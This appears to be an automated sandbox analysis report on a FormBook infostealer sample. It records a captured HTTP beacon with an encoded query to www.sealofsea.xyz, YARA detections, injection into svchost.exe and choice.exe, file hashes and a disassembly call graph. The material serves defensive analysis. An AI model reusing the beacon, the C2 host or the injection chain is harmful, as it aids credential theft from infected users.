                                                                                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                                                                                                                                Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"Open Sans",Helvetica,sans-serif;color:#000;padding:0;
                                                                                                                                                                Oct 9, 2024 13:06:13.273993969 CEST1289INData Raw: 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 30 2e 37 64 65 67 2c 23 65 39 65 64 66 62 20 2d 35 30 2e 32 31 25 2c 23 66 36 66
                                                                                                                                                                Data Ascii: margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!important;color:#333}h2{font-size:24px;font-weight:6
                                                                                                                                                                Oct 9, 2024 13:06:13.274051905 CEST1289INData Raw: 33 65 61 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 20 69 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 2d 62 61 72 20 69 6d 67 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 74
                                                                                                                                                                Data Ascii: 3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-container{display:flex;flex-direction:row}.message-subtitle{color:#2f1c6a;font-weight:700;font-size:24px;li
                                                                                                                                                                Oct 9, 2024 13:06:13.274072886 CEST1289INData Raw: 69 7a 65 3a 31 32 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 36 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 32 30 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 74 65 78
                                                                                                                                                                Data Ascii: ize:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-align:center;display:inline-block;padding:4px 8px;font-weight:700;border-radius:4px;background-color:#fc5185}@media screen and (max-width:768px){.message{width
                                                                                                                                                                Oct 9, 2024 13:06:13.274091959 CEST1289INData Raw: 72 69 61 6c 73 20 72 65 6c 3d 6e 6f 66 6f 6c 6c 6f 77 3e 3c 69 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 74 72 75 65 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 67 72 61 64 75 61 74 69 6f 6e 2d 63 61 70 22 3e 3c 2f 69 3e 20 54 75 74 6f 72 69 61 6c
                                                                                                                                                                Data Ascii: rials rel=nofollow><i aria-hidden=true class="fas fa-graduation-cap"></i> Tutorials</a></li><li><a href=https://support.hostinger.com/en/ rel=nofollow><i aria-hidden=true class="fa-readme fab"></i>Knowledge base</a></li><li><a href=https://www
                                                                                                                                                                Oct 9, 2024 13:06:13.274113894 CEST1289INData Raw: 20 68 6f 73 74 69 6e 67 20 66 6f 72 20 79 6f 75 72 20 73 75 63 63 65 73 73 66 75 6c 20 6f 6e 6c 69 6e 65 20 70 72 6f 6a 65 63 74 73 2e 3c 2f 70 3e 3c 62 72 3e 3c 61 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 6f 73 74 69 6e 67 65 72
                                                                                                                                                                Data Ascii: hosting for your successful online projects.</p><br><a href=https://www.hostinger.com rel=nofollow>Find your hosting plan</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title>Add w
                                                                                                                                                                Oct 9, 2024 13:06:13.274133921 CEST1289INData Raw: 5b 5d 2c 6e 3d 30 2c 74 3d 6f 2e 6c 65 6e 67 74 68 3b 6e 3c 74 3b 29 7b 69 66 28 35 35 32 39 36 3d 3d 28 36 33 34 38 38 26 28 72 3d 6f 5b 6e 2b 2b 5d 29 29 29 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 55 54 46 2d 31 36 28
                                                                                                                                                                Data Ascii: [],n=0,t=o.length;n<t;){if(55296==(63488&(r=o[n++])))throw new RangeError("UTF-16(encode): Illegal UTF-16 value");65535<r&&(r-=65536,e.push(String.fromCharCode(r>>>10&1023|55296)),r=56320|1023&r),e.push(String.fromCharCode(r))}return e.join(""
                                                                                                                                                                Oct 9, 2024 13:06:13.274240971 CEST1289INData Raw: 69 63 65 28 66 2c 30 2c 61 29 2c 66 2b 2b 7d 69 66 28 74 29 66 6f 72 28 66 3d 30 2c 77 3d 6d 2e 6c 65 6e 67 74 68 3b 66 3c 77 3b 66 2b 2b 29 79 5b 66 5d 26 26 28 6d 5b 66 5d 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6d 5b 66
                                                                                                                                                                Data Ascii: ice(f,0,a),f++}if(t)for(f=0,w=m.length;f<w;f++)y[f]&&(m[f]=String.fromCharCode(m[f]).toUpperCase().charCodeAt(0));return this.utf16.encode(m)},this.encode=function(t,a){var h,f,i,c,u,d,l,p,g,s,C,w;a&&(w=this.utf16.decode(t));var v=(t=this.utf1
                                                                                                                                                                Oct 9, 2024 13:06:13.274257898 CEST100INData Raw: 2c 61 63 63 6f 75 6e 74 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 70 61 74 68 4e 61 6d 65 22 29 3b 61 63 63 6f 75 6e 74 2e 69 6e 6e 65 72 48 54 4d 4c 3d 70 75 6e 79 63 6f 64 65 2e 54 6f 55 6e 69 63 6f 64 65 28
                                                                                                                                                                Data Ascii: ,account=document.getElementById("pathName");account.innerHTML=punycode.ToUnicode(pathName)</script>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                57192.168.11.304988285.159.66.9380
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Oct 9, 2024 13:06:21.594422102 CEST347OUTGET /a54a/?9X=EvKH2xeP-DpP307P&nhl=o4K6tsf3571BBp7MmhSZOYJB40PnENiiTojsdIYY6SFl2KjLaqenA37xSw6A2T1U0IJTLvgGXRIo0JyFUWzQew80cVlMmXXQBLtF+x/K+99dL6NKNKQQtqY= HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.sealofsea.xyz
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Oct 9, 2024 13:07:21.807486057 CEST194INHTTP/1.0 504 Gateway Time-out
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 0a 54 68 65 20 73 65 72 76 65 72 20 64 69 64 6e 27 74 20 72 65 73 70 6f 6e 64 20 69 6e 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                Data Ascii: <html><body><h1>504 Gateway Time-out</h1>The server didn't respond in time.</body></html>


                                                                                                                                                                Statistics

                                                                                                                                                                CPU Usage

                                                                                                                                                                Click to jump to process

                                                                                                                                                                Memory Usage

                                                                                                                                                                Click to jump to process

                                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                Behavior

                                                                                                                                                                Click to jump to process

                                                                                                                                                                System Behavior

                                                                                                                                                                General

                                                                                                                                                                Target ID:0
                                                                                                                                                                Start time:06:58:15
                                                                                                                                                                Start date:09/10/2024
                                                                                                                                                                Path:C:\Users\user\Desktop\8EhMjL3yNF.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:"C:\Users\user\Desktop\8EhMjL3yNF.exe"
                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                File size:1'336'099 bytes
                                                                                                                                                                MD5 hash:ADF7951566B1BB643B3FC555987CBDDC
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:2
                                                                                                                                                                Start time:06:58:19
                                                                                                                                                                Start date:09/10/2024
                                                                                                                                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:"C:\Users\user\Desktop\8EhMjL3yNF.exe"
                                                                                                                                                                Imagebase:0xe10000
                                                                                                                                                                File size:47'016 bytes
                                                                                                                                                                MD5 hash:B7C999040D80E5BF87886D70D992C51E
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.705383176691.0000000006730000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.705383176691.0000000006730000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.705376707747.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.705376707747.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.705378813444.0000000004D90000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.705378813444.0000000004390000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                Reputation:moderate
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:4
                                                                                                                                                                Start time:07:01:17
                                                                                                                                                                Start date:09/10/2024
                                                                                                                                                                Path:C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:"C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe"
                                                                                                                                                                Imagebase:0xd10000
                                                                                                                                                                File size:140'800 bytes
                                                                                                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.708578550328.0000000003FE0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.708578550328.00000000035E0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                Reputation:high
                                                                                                                                                                Has exited:false

                                                                                                                                                                General

                                                                                                                                                                Target ID:5
                                                                                                                                                                Start time:07:01:19
                                                                                                                                                                Start date:09/10/2024
                                                                                                                                                                Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:"C:\Windows\SysWOW64\choice.exe"
                                                                                                                                                                Imagebase:0xb30000
                                                                                                                                                                File size:28'160 bytes
                                                                                                                                                                MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.708574335375.0000000003010000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.708574335375.0000000003010000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.708579283397.0000000004D90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.708579283397.0000000004D90000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.708579534751.0000000004DE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.708579534751.0000000004DE0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                Reputation:moderate
                                                                                                                                                                Has exited:false

                                                                                                                                                                General

                                                                                                                                                                Target ID:6
                                                                                                                                                                Start time:07:01:31
                                                                                                                                                                Start date:09/10/2024
                                                                                                                                                                Path:C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:"C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe"
                                                                                                                                                                Imagebase:0xd10000
                                                                                                                                                                File size:140'800 bytes
                                                                                                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high
                                                                                                                                                                Has exited:false

                                                                                                                                                                General

                                                                                                                                                                Target ID:8
                                                                                                                                                                Start time:07:01:44
                                                                                                                                                                Start date:09/10/2024
                                                                                                                                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                                                Imagebase:0x7ff7b4cb0000
                                                                                                                                                                File size:675'744 bytes
                                                                                                                                                                MD5 hash:7B12552FD2A5948256B20EC97B708F94
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:true

                                                                                                                                                                Disassembly

                                                                                                                                                                Reset < >

                                                                                                                                                                  Execution Graph

                                                                                                                                                                  Execution Coverage:3.4%
                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0.4%
                                                                                                                                                                  Signature Coverage:8.8%
                                                                                                                                                                  Total number of Nodes:2000
                                                                                                                                                                  Total number of Limit Nodes:35
                                                                                                                                                                  execution_graph 85840 4010e0 85843 401100 85840->85843 85842 4010f8 85844 401113 85843->85844 85845 401120 85844->85845 85846 401184 85844->85846 85847 40114c 85844->85847 85877 401182 85844->85877 85848 40112c DefWindowProcW 85845->85848 85902 401000 Shell_NotifyIconW 85845->85902 85881 401250 85846->85881 85849 401151 85847->85849 85850 40119d 85847->85850 85848->85842 85854 401219 85849->85854 85855 40115d 85849->85855 85852 4011a3 85850->85852 85853 42afb4 85850->85853 85852->85845 85861 4011b6 KillTimer 85852->85861 85862 4011db SetTimer RegisterWindowMessageW 85852->85862 85897 40f190 10 API calls 85853->85897 85854->85845 85858 401225 85854->85858 85856 401163 85855->85856 85857 42b01d 85855->85857 85863 42afe9 85856->85863 85864 40116c 85856->85864 85857->85848 85901 4370f4 52 API calls 85857->85901 85913 468b0e 74 API calls 85858->85913 85896 401000 Shell_NotifyIconW 85861->85896 85865 401193 85862->85865 85870 401204 CreatePopupMenu 85862->85870 85899 40f190 10 API calls 85863->85899 85864->85845 85872 401174 85864->85872 85865->85842 85866 42b04f 85903 40e0c0 85866->85903 85870->85842 85898 45fd57 65 API calls 85872->85898 85874 42afe4 85874->85865 85875 42b00e 85900 401a50 331 API calls 85875->85900 85876 4011c9 PostQuitMessage 85876->85842 85877->85848 85880 42afdc 85880->85848 85880->85874 85882 401262 85881->85882 85883 4012e8 85881->85883 85914 401b80 85882->85914 85883->85865 85885 4012d1 KillTimer SetTimer 85885->85883 85886 40128c 85886->85885 85887 4012bb 85886->85887 85888 4272ec 85886->85888 85889 4012c5 85887->85889 85890 42733f 85887->85890 85891 4272f4 Shell_NotifyIconW 85888->85891 85892 42731a Shell_NotifyIconW 85888->85892 85889->85885 85893 427393 Shell_NotifyIconW 85889->85893 85894 427348 Shell_NotifyIconW 85890->85894 85895 42736e Shell_NotifyIconW 85890->85895 85891->85885 85892->85885 85893->85885 85894->85885 85895->85885 85896->85876 85897->85865 85898->85880 85899->85875 85900->85877 85901->85877 85902->85866 85905 40e0e7 85903->85905 85904 40e142 85911 40e184 85904->85911 86012 4341e6 63 API calls 85904->86012 85905->85904 85906 42729f DestroyIcon 85905->85906 85906->85904 85908 40e1a0 Shell_NotifyIconW 85910 401b80 54 API calls 85908->85910 85909 4272db Shell_NotifyIconW 85912 40e1ba 85910->85912 85911->85908 85911->85909 85912->85877 85913->85874 85915 401b9c 85914->85915 85935 401c7e 85914->85935 85936 4013c0 85915->85936 85918 42722b LoadStringW 85921 427246 85918->85921 85919 401bb9 85941 402160 85919->85941 85955 40e0a0 85921->85955 85922 401bcd 85924 427258 85922->85924 85925 401bda 85922->85925 85959 40d200 52 API calls 85924->85959 85925->85921 85926 401be4 85925->85926 85954 40d200 52 API calls 85926->85954 85929 427267 85930 42727b 85929->85930 85932 401bf3 85929->85932 85960 40d200 52 API calls 85930->85960 85934 401c62 Shell_NotifyIconW 85932->85934 85933 427289 85934->85935 85935->85886 85961 4115d7 85936->85961 85942 426daa 85941->85942 85943 40216b 85941->85943 85999 40c600 85942->85999 85946 402180 85943->85946 85947 40219e 85943->85947 85945 426db5 85945->85922 85998 403bd0 52 API calls 85946->85998 85949 4013a0 52 API calls 85947->85949 85951 4021a5 85949->85951 85950 402187 85950->85922 85952 426db7 85951->85952 85953 4115d7 52 API calls 85951->85953 85953->85950 85954->85932 85956 40e0b2 85955->85956 85957 40e0a8 85955->85957 85956->85932 86011 403c30 52 API calls 85957->86011 85959->85929 85960->85933 85963 4115e1 85961->85963 85964 4013e4 85963->85964 85968 4115fd 85963->85968 85975 4135bb 85963->85975 85972 4013a0 85964->85972 85965 41163b 85990 4180af 46 API calls 85965->85990 85967 411645 85991 418105 RaiseException 85967->85991 85968->85965 85989 41130a 51 API calls 85968->85989 85971 411656 85973 4115d7 52 API calls 85972->85973 85974 4013a7 85973->85974 85974->85918 85974->85919 85976 413638 85975->85976 85982 4135c9 85975->85982 85997 417f77 46 API calls 85976->85997 85979 4135f7 RtlAllocateHeap 85979->85982 85988 413630 85979->85988 85981 413624 85995 417f77 46 API calls 85981->85995 85982->85979 85982->85981 85985 413622 85982->85985 85986 4135d4 85982->85986 85996 417f77 46 API calls 85985->85996 85986->85982 85992 418901 46 API calls 85986->85992 85993 418752 46 API calls 85986->85993 85994 411682 GetModuleHandleW GetProcAddress ExitProcess 85986->85994 85988->85963 85989->85965 85990->85967 85991->85971 85992->85986 85993->85986 85995->85985 85996->85988 85997->85988 85998->85950 86000 40c619 85999->86000 86001 40c60a 85999->86001 86000->85945 86001->86000 86004 4026f0 86001->86004 86003 426d7a 86003->85945 86005 426873 86004->86005 86006 4026ff 86004->86006 86007 4013a0 52 API calls 86005->86007 86006->86003 86008 42687b 86007->86008 86009 4115d7 52 API calls 86008->86009 86010 42689e 86009->86010 86010->86003 86011->85956 86012->85911 86013 40bd20 86014 428194 86013->86014 86015 40bd2d 86013->86015 86017 40bd43 86014->86017 86019 4281bc 86014->86019 86021 4281b2 86014->86021 86016 40bd37 86015->86016 86036 4531b1 85 API calls 86015->86036 86025 40bd50 86016->86025 86035 45e987 86 API calls 86019->86035 86034 40b510 VariantClear 86021->86034 86024 4281ba 86026 426cf1 86025->86026 86027 40bd63 86025->86027 86046 44cde9 52 API calls 86026->86046 86037 40bd80 86027->86037 86030 40bd73 86030->86017 86031 426cfc 86032 40e0a0 52 API calls 86031->86032 86033 426d02 86032->86033 86034->86024 86035->86015 86036->86016 86038 40bd8e 86037->86038 86039 40bdb7 86037->86039 86038->86039 86040 40bded 86038->86040 86041 40bdad 86038->86041 86039->86030 86043 4115d7 52 API calls 86040->86043 86047 402f00 86041->86047 86044 40bdf6 86043->86044 86044->86039 86045 4115d7 52 API calls 86044->86045 86045->86039 86046->86031 86048 402f10 86047->86048 86049 402f0c 86047->86049 86050 4115d7 52 API calls 86048->86050 86051 4268c3 86048->86051 86049->86039 86052 402f51 86050->86052 86052->86039 86053 425ba2 86058 40e360 86053->86058 86055 425bb4 86074 41130a 51 API calls 86055->86074 86057 425bbe 86059 4115d7 52 API calls 86058->86059 86060 40e3ec GetModuleFileNameW 86059->86060 86075 413a0e 86060->86075 86062 40e421 86078 413a9e 86062->86078 86065 4115d7 52 API calls 86066 40e45e 86065->86066 86081 40bc70 86066->86081 86070 40e4a9 86070->86055 86071 401c90 52 API calls 86073 40e4a1 86071->86073 86072 4115d7 52 API calls 86072->86073 86073->86070 86073->86071 86073->86072 86074->86057 86100 413801 86075->86100 86130 419efd 86078->86130 86082 4115d7 52 API calls 86081->86082 86083 40bc98 86082->86083 86084 4115d7 52 API calls 86083->86084 86085 40bca6 86084->86085 86086 40e4c0 86085->86086 86142 403350 86086->86142 86088 40e4cb RegOpenKeyExW 86089 427190 RegQueryValueExW 86088->86089 86090 40e4eb 86088->86090 86091 4271b0 86089->86091 86092 42721a RegCloseKey 86089->86092 86090->86073 86093 4115d7 52 API calls 86091->86093 86092->86073 86094 4271cb 86093->86094 86149 43652f 52 API calls 86094->86149 86096 4271d8 RegQueryValueExW 86097 4271f7 86096->86097 86099 42720e 86096->86099 86098 402160 52 API calls 86097->86098 86098->86099 86099->86092 86101 41389e 86100->86101 86106 41381a 86100->86106 86102 4139e8 86101->86102 86103 413a00 86101->86103 86127 417f77 46 API calls 86102->86127 86129 417f77 46 API calls 86103->86129 86106->86101 86113 41388a 86106->86113 86122 419e30 46 API calls 86106->86122 86107 4139ed 86128 417f25 10 API calls 86107->86128 86110 41396c 86110->86101 86111 413967 86110->86111 86114 41397a 86110->86114 86111->86062 86112 413929 86112->86101 86115 413945 86112->86115 86124 419e30 46 API calls 86112->86124 86113->86101 86121 413909 86113->86121 86123 419e30 46 API calls 86113->86123 86126 419e30 46 API calls 86114->86126 86115->86101 86115->86111 86117 41395b 86115->86117 86125 419e30 46 API calls 86117->86125 86121->86110 86121->86112 86122->86113 86123->86121 86124->86115 86125->86111 86126->86111 86127->86107 86128->86111 86129->86111 86131 419f13 86130->86131 86132 419f0e 86130->86132 86139 417f77 46 API calls 86131->86139 86132->86131 86138 419f2b 86132->86138 86134 419f18 86140 417f25 10 API calls 86134->86140 86137 40e454 86137->86065 86138->86137 86141 417f77 46 API calls 86138->86141 86139->86134 86140->86137 86141->86134 86143 403367 86142->86143 86144 403358 86142->86144 86145 4115d7 52 API calls 86143->86145 86144->86088 86146 403370 86145->86146 86147 4115d7 52 API calls 86146->86147 86148 40339e 86147->86148 86148->86088 86149->86096 86150 416454 86187 416c70 86150->86187 86152 416460 GetStartupInfoW 86153 416474 86152->86153 86188 419d5a HeapCreate 86153->86188 86155 4164cd 86156 4164d8 86155->86156 86272 41642b 46 API calls 86155->86272 86189 417c20 GetModuleHandleW 86156->86189 86159 4164de 86160 4164e9 86159->86160 86273 41642b 46 API calls 86159->86273 86208 41aaa1 GetStartupInfoW 86160->86208 86164 416503 GetCommandLineW 86221 41f584 GetEnvironmentStringsW 86164->86221 86168 416513 86227 41f4d6 GetModuleFileNameW 86168->86227 86170 41651d 86171 416528 86170->86171 86275 411924 46 API calls 86170->86275 86231 41f2a4 86171->86231 86174 41652e 86175 416539 86174->86175 86276 411924 46 API calls 86174->86276 86245 411703 86175->86245 86178 416541 86180 41654c 86178->86180 86277 411924 46 API calls 86178->86277 86249 40d6b0 86180->86249 86183 41657c 86279 411906 46 API calls 86183->86279 86186 416581 86187->86152 86188->86155 86190 417c34 86189->86190 86191 417c3d GetProcAddress GetProcAddress GetProcAddress GetProcAddress 86189->86191 86280 4178ff 49 API calls 86190->86280 86193 417c87 TlsAlloc 86191->86193 86196 417cd5 TlsSetValue 86193->86196 86197 417d96 86193->86197 86194 417c39 86194->86159 86196->86197 86198 417ce6 86196->86198 86197->86159 86281 418151 InitializeCriticalSectionAndSpinCount 86198->86281 86200 417d91 86289 4178ff 49 API calls 86200->86289 86202 417d2a 86202->86200 86282 416b49 86202->86282 86205 417d76 86288 41793c 46 API calls 86205->86288 86207 417d7e GetCurrentThreadId 86207->86197 86209 416b49 46 API calls 86208->86209 86210 41aabf 86209->86210 86210->86210 86211 41ac34 86210->86211 86213 416b49 46 API calls 86210->86213 86215 4164f7 86210->86215 86217 41abb4 86210->86217 86212 41ac6a GetStdHandle 86211->86212 86214 41acce SetHandleCount 86211->86214 86216 41ac7c GetFileType 86211->86216 86220 41aca2 InitializeCriticalSectionAndSpinCount 86211->86220 86212->86211 86213->86210 86214->86215 86215->86164 86274 411924 46 API calls 86215->86274 86216->86211 86217->86211 86218 41abe0 GetFileType 86217->86218 86219 41abeb InitializeCriticalSectionAndSpinCount 86217->86219 86218->86217 86218->86219 86219->86215 86219->86217 86220->86211 86220->86215 86222 41f595 86221->86222 86223 41f599 86221->86223 86222->86168 86299 416b04 86223->86299 86225 41f5bb 86226 41f5c2 FreeEnvironmentStringsW 86225->86226 86226->86168 86228 41f50b 86227->86228 86229 416b04 46 API calls 86228->86229 86230 41f54e 86228->86230 86229->86230 86230->86170 86232 41f2bc 86231->86232 86236 41f2b4 86231->86236 86233 416b49 46 API calls 86232->86233 86238 41f2e0 86233->86238 86234 41f336 86306 413748 86234->86306 86236->86174 86237 416b49 46 API calls 86237->86238 86238->86234 86238->86236 86238->86237 86239 41f35c 86238->86239 86242 41f373 86238->86242 86305 41ef12 46 API calls 86238->86305 86241 413748 46 API calls 86239->86241 86241->86236 86312 417ed3 86242->86312 86244 41f37f 86244->86174 86246 411711 86245->86246 86248 411750 86246->86248 86331 41130a 51 API calls 86246->86331 86248->86178 86250 42e2f3 86249->86250 86251 40d6cc 86249->86251 86332 408f40 86251->86332 86253 40d707 86336 40ebb0 86253->86336 86256 40d737 